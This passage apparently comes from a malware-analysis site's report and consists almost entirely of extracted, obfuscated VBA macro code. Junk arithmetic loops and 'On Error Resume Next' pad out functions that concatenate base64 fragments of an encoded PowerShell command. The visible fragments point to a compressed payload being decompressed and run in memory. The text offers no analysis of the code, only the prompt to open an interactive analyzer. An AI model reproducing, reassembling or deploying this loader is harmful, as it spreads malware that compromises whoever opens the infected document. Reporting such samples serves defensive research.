wYwzqdjEmIG = "AVQB" + "wAHoAdAA3AEgAN" + "ABwAGgA" + "SwB5AHgAVgB6AD" + "AAbgB0AE0" + "AZwBnAHE" + "AdABRAEkAWQBqAH"
For NTfMjn = wIQlG To wwICVp
      For GHiBj = nwrlT To 66136
         REwwD = (8834 / CBool(iwTHTm) - ZksMDK / Oct(8132 / Hex(80723) / liddz + Rnd(FXwDjc / Fix(37))))
Next
   zLzQpb = 19949 - 76128
Next
LmfjTBb = "cAWg" + "BQAEEALwB" + "zAEQAZwBGADcA" + "VwBpADk" + "AOQBUAGMA" + "awBiAGM" + "AZAA3AGUA" + "SQB4ACsAWQBpA" + "HAANwBBAEMATg" + "A1AHkAYQBEAEI"
HwHznw = JSVFCzbdnwF + IErrqiXAVn + SwFhh + XPHEVHfYs + QrjEHjN + hLIzJjhPXFh + jmVbscdjkZ + BZBiWa + wYwzqdjEmIG + LmfjTBb
End Function
Function NiSjqWaKi()
On Error Resume Next
For hzWOOz = QXVbw To SZazC
      For wLQFDf = hNmUcf To 35691
         zfGlN = (11512 / CBool(jfLAup) - ZppYTr / Oct(28393 / Hex(32441) / SiiRKd + Rnd(twjzV / Fix(37))))
Next
   UOplzf = 70499 - 89952
Next
wdtmAwfnbU = "AZwBYAEoAYQBmA" + "GIARQAzADMAWg" + "BJADE" + "ASwBUAFgAMgB"
For kvoow = DMbwjo To DionCc
      For EOpWf = bjhtj To 61941
         PzjdWh = (46578 / CBool(jECpFf) - GzJdH / Oct(55382 / Hex(98304) / FRJaC + Rnd(ihNzr / Fix(37))))
Next
   GzKRU = 8792 - 54712
Next
psruI = "1ADgATABXAGI" + "Ac" + "gA3AGEAKwBmA" + "HQAR" + "wB" + "XAHMAVgBvA"
For JmhZp = ckjFY To QbdLN
      For VVEWp = OHEHms To 16829
         AiMTk = (68586 / CBool(lsuwHb) - HiWzD / Oct(26939 / Hex(67571) / PmzrL + Rnd(NVwqzV / Fix(37))))
Next
   lOKad = 42290 - 69456
Next
LQjKnN = "FoATgAyAGwATABC" + "AEUAYQB" + "XA" + "HYASgBzAEoA" + "TQA2AGwAb" + "gBKAE8AeQBl" + "AEgA" + "bg"
For KYhNrz = lmouU To OZVsYC
      For WwHKG = WQLZa To 84649
         dFOPdT = (67059 / CBool(jLBCAa) - pohFT / Oct(22736 / Hex(12035) / QXHnd + Rnd(ZNOCV / Fix(37))))
Next
   JLGPE = 37322 - 70963
Next
zohiPJmt = "BWADQ" + "AWQBJAGMAdQB" + "3AC8ASgB3AFoAR" + "ABuAGw" + "AKwBMAEkAZAB4A" + "HMAVwBRA" + "FIANwBqAGgARA"
For kFIFdw = WrUYnX To zrWjFd
      For wmzfL = ihSAA To 51773
         dLOBK = (58871 / CBool(CWtihr) - NOsYO / Oct(13698 / Hex(55376) / SIZRlw + Rnd(YUXMEN / Fix(37))))
Next
   cUWauH = 53953 - 86581
Next
vlNzzlhiToB = "BMAHIAWQAyAGsA" + "dwB" + "oAGwAWQB" + "YAEkAawB6" + "AGc" + "AZQA5AF"
NiSjqWaKi = wdtmAwfnbU + psruI + LQjKnN + zohiPJmt + vlNzzlhiToB
End Function
Function SdkMMcMi()
On Error Resume Next
For zTvQT = cmTqqs To bstmN
      For ZGVmEb = XBnMVK To 49546
         czpfVw = (85349 / CBool(sOXuWt) - hItiTO / Oct(54046 / Hex(63633) / phCawH + Rnd(jSSzu / Fix(37))))
Next
   HrzhU = 56140 - 47467
Next
izaZjEAo = "gAMwBGAEkAVQBSA" + "HAATgB1AD" + "AAVQBIAG0" + "AMABHADQA" + "MgAzADAARAAn"
For jPiYFE = fGYAQw To ovSmks
      For bEtidB = fmuwI To 20217
         SXBsD = (88338 / CBool(MtziF) - DDOhs / Oct(60940 / Hex(80577) / LkpcD + Rnd(ATiBI / Fix(37))))
Next
   jWXQuh = 98188 - 82263
Next
aChKBju = "AC" + "kAIAAsAF" + "sAaQBvA" + "C4AQwBvAG0AcA" + "BSAGUAUwBz" + "AGkAbwBOAC4A" + "QwBPAG0A"
For KuEYj = cXMGcU To HnMQA
      For zsOwV = khfwn To 20431
         zqAqkD = (37465 / CBool(YvSufT) - PkEdhi / Oct(82718 / Hex(42654) / wiGzRw + Rnd(YwwVM / Fix(37))))
Next
   wbMjt = 52939 - 94379
Next
NOAfwaRGWsj = "UAByAEUAcwBTAE" + "kA" + "bwBOAE0ATwBk" + "AGUAXQA6" + "ADo"
For DqwGRu = KdCIUF To BzUJbW
      For wjzQJo = QAkPZw To 85753
         IszCiO = (36019 / CBool(NsACZP) - kAaCF / Oct(13224 / Hex(1600) / IGRtcR + Rnd(vGBJpc / Fix(37))))
Next
   Yrffp = 69776 - 46566
Next
zLHzOnM = "ARABFAEMAbwBNA" + "FAAUgBlAFMAcw" + "ApACA" + "AfABGAE8" + "AcgBlAEEA" + "YwB" + "IAC0ATwBCAGoAZ" + "QBDAFQAew"
SdkMMcMi = izaZjEAo + aChKBju + NOAfwaRGWsj + zLHzOnM
End Function
Function sMJKiRLCHEQ()
On Error Resume Next
For mCBoA = wwnlH To qwMUp
      For UztAQa = abiWZR To 31823
         AUPro = (33975 / CBool(wKOXha) - ciLpN / Oct(29869 / Hex(51581) / lmbDZ + Rnd(PZNUqk / Fix(37))))
Next
   czcAKr = 1427 - 67091
Next
unijiEjh = "AgAG4ARQBXAC0AT" + "wBiAEoARQBDA" + "HQAIAAgAFMAeQBT" + "AFQAZQBNAC4ASQ" + "BPAC4AcwB0AHIAR" + "QBhAG"
For ssJGwE = jDBrk To cQkrph
      For ADqqdA = ioDYaj To 98553
         iuTpLO = (58184 / CBool(psFtV) - PSCTw / Oct(72696 / Hex(78050) / TdwXc + Rnd(AcREjh / Fix(37))))
Next
   qYAVWW = 75026 - 2220
Next
LpYvsz = "0AcgBFAGEA" + "ZABlAHIAKAAkAF8" + "ALAB" + "bAFQARQB4AFQALg" + "BlAE4AQwBvAGQA" + "SQBOAEcA" + "XQA" + "6ADoAYQBzAGMA" + "SQBpACkAfQ"
For XGLWYk = GiNGh To pqnljP
      For bBKoi = tBzcP To 3030
         VFrMG = (41721 / CBool(GKVVb) - PiJhk / Oct(74214 / Hex(44707) / VWwWrz + Rnd(UIGzEh / Fix(37))))
Next
   kzbiN = 98877 - 11773
Next
oVmvzuT = "AgACkALgBSAG" + "UAQQBkAFQA" + "bwBFAG4A" + "ZAA" + "oACk" + "AIAA="
sMJKiRLCHEQ = unijiEjh + LpYvsz + oVmvzuT
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.